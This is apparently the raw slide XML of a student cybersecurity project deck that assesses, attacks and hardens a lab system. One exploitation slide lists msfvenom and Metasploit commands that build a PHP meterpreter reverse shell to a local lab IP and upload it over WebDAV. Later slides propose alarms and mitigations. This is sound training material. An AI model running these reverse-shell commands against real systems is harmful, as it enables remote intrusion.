  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1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2" name="Google Shape;862;p4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63" name="Google Shape;863;p4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4" name="Google Shape;864;p4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65" name="Google Shape;865;p4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6" name="Google Shape;866;p4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7" name="Google Shape;867;p44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44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9" name="Google Shape;869;p44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44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1" name="Google Shape;871;p44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44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3" name="Google Shape;873;p44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44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5" name="Google Shape;875;p44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44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7" name="Google Shape;877;p44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44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9" name="Google Shape;879;p44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44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81" name="Google Shape;881;p44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44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83" name="Google Shape;883;p4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4" name="Google Shape;884;p44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5" name="Google Shape;885;p4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6" name="Google Shape;886;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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7" name="Google Shape;887;p4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8" name="Google Shape;888;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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4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44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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4. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1"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4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3" name="Google Shape;893;p4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894" name="Google Shape;894;p4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5" name="Google Shape;895;p4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6" name="Google Shape;896;p4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7" name="Google Shape;897;p4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8" name="Google Shape;898;p45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45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0" name="Google Shape;900;p45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45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2" name="Google Shape;902;p45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45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4" name="Google Shape;904;p45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45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6" name="Google Shape;906;p45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45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8" name="Google Shape;908;p45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45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10" name="Google Shape;910;p45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45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12" name="Google Shape;912;p45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45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14" name="Google Shape;914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8" name="Google Shape;918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" name="Google Shape;919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" name="Google Shape;920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" name="Google Shape;921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5. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_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4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24" name="Google Shape;924;p4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925" name="Google Shape;925;p4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6" name="Google Shape;926;p4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27" name="Google Shape;927;p4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8" name="Google Shape;928;p4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29" name="Google Shape;929;p46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46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1" name="Google Shape;931;p46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46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3" name="Google Shape;933;p46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46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5" name="Google Shape;935;p46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46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7" name="Google Shape;937;p46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46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9" name="Google Shape;939;p46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46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41" name="Google Shape;941;p46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46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43" name="Google Shape;943;p46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46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45" name="Google Shape;945;p46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6" name="Google Shape;946;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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7" name="Google Shape;947;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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8" name="Google Shape;948;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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9" name="Google Shape;949;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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0" name="Google Shape;950;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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1" name="Google Shape;951;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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" name="Google Shape;952;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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6. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1"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55" name="Google Shape;955;p4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956" name="Google Shape;956;p4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7" name="Google Shape;957;p4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58" name="Google Shape;958;p4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9" name="Google Shape;959;p4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0" name="Google Shape;960;p47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47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2" name="Google Shape;962;p47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47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4" name="Google Shape;964;p47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47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6" name="Google Shape;966;p47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47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68" name="Google Shape;968;p47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47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0" name="Google Shape;970;p47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47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2" name="Google Shape;972;p47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47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4" name="Google Shape;974;p47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47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76" name="Google Shape;976;p47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7" name="Google Shape;977;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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8" name="Google Shape;978;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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" name="Google Shape;979;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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0" name="Google Shape;980;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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1" name="Google Shape;981;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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3" name="Google Shape;983;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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7. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1"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5" name="Google Shape;985;p48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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="15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87" name="Google Shape;987;p4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8" name="Google Shape;988;p4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89" name="Google Shape;98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549" y="769725"/>
            <a:ext cx="7488902" cy="18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Google Shape;990;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341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991" name="Google Shape;991;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075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8. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1"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Google Shape;993;p49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4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5" name="Google Shape;995;p49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96" name="Google Shape;996;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="28807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997" name="Google Shape;99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959" y="1143000"/>
            <a:ext cx="1222082" cy="1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9. Take a Break 1">
  <p:cSld name="CUSTOM"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0" name="Google Shape;1000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. Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_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6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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="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0. Take a Break 2">
  <p:cSld name="CUSTOM_1"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3" name="Google Shape;1003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4" name="Google Shape;1004;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="4114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05" name="Google Shape;1005;p51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500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7. The End">
  <p:cSld name="CUSTOM_7"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7" name="Google Shape;1007;p5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52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sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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1010" name="Google Shape;101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599" y="496138"/>
            <a:ext cx="5046801" cy="41512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1. Take a Break 1">
  <p:cSld name="CUSTOM_9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5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3" name="Google Shape;1013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. Transition Slide">
  <p:cSld name="CUSTOM_17_2_1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7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 txBox="1"/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7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7. Text Only">
  <p:cSld name="CUSTOM_2_7_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1" name="Google Shape;61;p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" name="Google Shape;63;p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3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3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8. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="119" l="0" r="0" t="119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0" y="675975"/>
            <a:ext cx="6674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0" y="1245800"/>
            <a:ext cx="66996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3" type="subTitle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" name="Google Shape;73;p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" name="Google Shape;75;p9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9. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2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0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0"/>
          <p:cNvSpPr txBox="1"/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9" name="Google Shape;79;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="139" r="149" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="200253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0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tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1703925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Engagement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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System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9" name="Google Shape;1019;p5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6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Exploitation: File Upload Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p6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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="3154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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After logging onto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>dav://192.168.1.105/webdav, I set up a reverse shell by running the following commands: </a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="24292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700"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:srgbClr val="24292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700"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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msfconsole </a:t>
            </a:r>
            <a:endParaRPr sz="7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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr sz="7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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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 payload php/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="7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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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show options and point out they need to set the LHOST.</a:t>
            </a:r>
            <a:endParaRPr sz="7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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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 LHOST 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="7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700"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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 LPORT 4444</a:t>
            </a:r>
            <a:endParaRPr sz="7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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7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exploit</a:t>
            </a:r>
            <a:endParaRPr sz="7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4292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36" name="Google Shape;1136;p63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137" name="Google Shape;1137;p6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38" name="Google Shape;1138;p63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" name="Google Shape;1139;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;1140;p6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41" name="Google Shape;1141;p63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2" name="Google Shape;1142;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="3154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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428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After running the listed commands, a reverse shell appeared in the root folder and was moved to the webdav folder under the Network file as shown in the provided screenshot.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44" name="Google Shape;1144;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;p6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46" name="Google Shape;1146;p63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7" name="Google Shape;1147;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="3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9" name="Google Shape;114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1663" y="1480575"/>
            <a:ext cx="1987525" cy="30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4" name="Google Shape;1154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155" name="Google Shape;1155;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="85953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 Team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Log Analysis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Attack Characterization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56" name="Google Shape;1156;p64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6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                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Google Shape;1162;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-12425" y="675975"/>
            <a:ext cx="4400100" cy="12696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63" name="Google Shape;1163;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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[Insert Here]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Include a screenshot of Kibana logs depicting the port scan.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4" name="Google Shape;1164;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4483425" y="675975"/>
            <a:ext cx="4139700" cy="9717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165" name="Google Shape;116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425" y="611150"/>
            <a:ext cx="9084148" cy="500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6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Finding the Request for the Hidden Directory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71" name="Google Shape;1171;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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endParaRPr sz="1200"/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72" name="Google Shape;1172;p6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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540225" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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[Insert Here]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Include a screenshot of Kibana logs depicting the request for the hidden directory.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4" name="Google Shape;1174;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5208300" cy="9717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175" name="Google Shape;117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94300"/>
            <a:ext cx="9168599" cy="484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6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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Uncovering the Brute Force Attack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1" name="Google Shape;1181;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/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82" name="Google Shape;1182;p6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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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[Insert Here]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Include a screenshot of Kibana logs depicting the brute force attack. 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4" name="Google Shape;1184;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793650" y="1467800"/>
            <a:ext cx="5791200" cy="9717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185" name="Google Shape;1185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299" y="594300"/>
            <a:ext cx="9168601" cy="499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6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           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Finding the WebDAV Connection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1" name="Google Shape;1191;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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endParaRPr sz="1200"/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92" name="Google Shape;1192;p6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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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many requests were made to this directory?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7640" lvl="0" marL="3200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Which files were requested?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="2539500" cy="9717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195" name="Google Shape;1195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5925"/>
            <a:ext cx="9168600" cy="452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0" name="Google Shape;1200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201" name="Google Shape;1201;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="20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Blue Team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Proposed Alarms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Mitigation Strategies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02" name="Google Shape;1202;p6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7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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p70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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30513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kind of alarm can be set to detect future port scans?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Set an alarm to go off any time unauthorized activity is detected on port 4444. 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10" name="Google Shape;1210;p70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configurations can be set on the host to mitigate port scans?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Configure the firewall so that it blocks port scans from attackers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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203800" y="491790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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="35412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kind of alarm can be set to detect future unauthorized access?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could set an alert that goes off for any machine that attempts to access the directory or file in the directory.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18" name="Google Shape;1218;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="22422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configuration can be set on the host to block unwanted access?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Remove the directory and file from the server in order to prevent any unwanted access. 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7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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p72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72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kind of alarm can be set to detect future brute force attacks?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Set an alert to go off if 401 UNAUTHORIZED is returned from any server over a certain threshold that would weed out forgotten passwords. Start with 10 in one hour and refine from there.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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Set an alert to go off if the user_agent.original value includes HYDRA in the name.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26" name="Google Shape;1226;p72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configuration can be set on the host to block brute force attacks?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After the limit of ten 401 UNAUTHORIZED codes have been returned from a server, that server can automatically drop traffic from the offending IP address for a period of 1 hour. We could also display a lockout message and lock the page from login for a temporary period of time from that user.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5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5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document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p5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55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" name="Google Shape;1028;p55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029" name="Google Shape;1029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0" name="Google Shape;1030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" name="Google Shape;1031;p55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032" name="Google Shape;1032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3" name="Google Shape;1033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" name="Google Shape;1034;p55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035" name="Google Shape;1035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6" name="Google Shape;1036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" name="Google Shape;1037;p55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038" name="Google Shape;1038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9" name="Google Shape;1039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" name="Google Shape;1040;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="13788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Network Topology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1" name="Google Shape;1041;p55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55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55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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-124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 Team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Security Assessment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5" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15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Blue Team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Log Analysis and Attack Characterization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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Hardening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Proposed Alarms and Mitigation Strategies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7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Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p73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73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kind of alarm can be set to detect future access to this directory?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Create an alert to go off anytime the directory is accessed by any other machine besides the authorized machine.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34" name="Google Shape;1234;p73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configuration can be set on the host to control access?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Disable connections to the shared folder from the web interface. Restrict connections to the shared folder by implementing a firewall rule.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7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Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
